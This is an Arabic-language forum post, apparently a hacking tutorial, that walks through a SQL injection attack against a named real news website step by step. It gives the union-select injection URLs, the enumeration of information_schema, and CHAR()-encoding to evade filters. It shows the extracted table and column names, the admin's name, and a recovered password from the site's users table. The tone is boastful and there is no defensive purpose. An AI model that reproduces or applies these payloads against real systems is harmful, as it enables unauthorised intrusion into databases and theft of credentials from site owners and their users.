كيفكم اخواني الافاضل
اليوم معانا درس بسيط
ومفهوم ومهم
في بعض الاحيان يوقف الشخص عن العمل
لكن بعد اطلاعك على درس اليوم
لن تجد صعوبة باذن الله
مثلا معانا هذا الموقع
http://www.teaminsightmag.com/news.php?id=286 order by 15
لن تجد له خطأ
فعلينا اضافة
كود PHP:
بعد المتغير اي الرقم 286 علامة '
وبعد الرابط 23% وهى تعنى +--+ مشفرة
الموقع الخاص اللي يشفر لنا الكلمات http://www.waraxe.us/sql-char-encoder.html شوفو النتيجة بدأت تظهر :surprised: المهم الخطأ يختفي عند الرقم 11 والاستغلال يكون
http://www.teaminsightmag.com/news.p...7,8,9,10,11%23
ويصير هكذا لكن لم تظهر معانا الاعمدة ههههههههههه:gasp:
نضيف علامة - بعد علامة = http://www.teaminsightmag.com/news.php?id=-286'+union+select+1,2,3,4,5,6,7,8,9,10,11%23 ظهرت معانا الاعمدة المصابة ثم نضيف في العمود المصاب اي في مكان الرقم 3
group_concat(table_name)
و في اخر السطر
+from+information_schema.tables
وظهرت معانا
advertisers
articles
comments
events
manager_navigation
news_headlines
settings
sites
survey_answers
sur
طب واحد يقلى انا هاعرف فين الجدول الى هاشتغل علية من كل دول
اقول ناخد واحد واحد ونضيفة بعد +from+ ونجرب
+from+
واذا لم تفلح فلابد عليك انك تشفر الكلمات
مثلا نأخذ كلمة
advertisers تشفيرها يكون =
CONCAT(CHAR(97),CHAR(100),CHAR(118),CHAR(101),CHAR (114),CHAR(116),CHAR(105),CHAR(115),CHAR(101),CHAR (114),CHAR(115))
وهذه نضعها في مكان الرقم 3
group_concat(table_name,0x3e,column_name)
وهذه في اخر الرابط
+from+information_schema.columns+where+table_name+ like+
ونظيف لها الكلمة المشفرة
ويصير الرابط هكذا http://www.teaminsightmag.com/news.php?id=-286%27+union+select+1,2,group_concat%28table_name, 0x3e,column_name%29,4,5,6,7,8,9,10,11++from+inform ation_schema.columns+where+table_name+like+CONCAT% 28CHAR%2897%29,CHAR%28100%29,CHAR%28118%29,CHAR%28 101%29,CHAR%28114%29,CHAR%28116%29,CHAR%28105%29,C HAR%28115%29,CHAR%28101%29,CHAR%28114%29,CHAR%2811 5%29%29%23 ظهر معانا advertisers>id
advertisers>name
advertisers>url
advertisers>phone
advertisers>status
advertisers>site
advertisers>type ونشوف كلمة name ملاحظة دائما نعيد للوراء ونضع كلمة name في مكان الرقم 3
و
+from+advertisers
في آخر الصفحة وتصير الصفحة
http://www.teaminsightmag.com/news.p...advertisers%23 ظهر معانا اسم الادمن ههههههههههههه نكمل ولا لالالالالالالالالالالا
نجرب الطريقة العادية فى الحقن ونظهر الباس
concat(column_name,0x3e,table_schema,0x3e,table_na me)
+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)%23
ظهر جدول مختلف
http://www.teaminsightmag.com/news.p...15,%2037%29%23
نغير الجدول ونجرب ونشوف
http://www.teaminsightmag.com/news.p...+from+users%23
الباس طلع وهو sdfasdasd
هههههه لا تنسى .... التقييم
jo'd u]l /i,v hghul]m td hgprk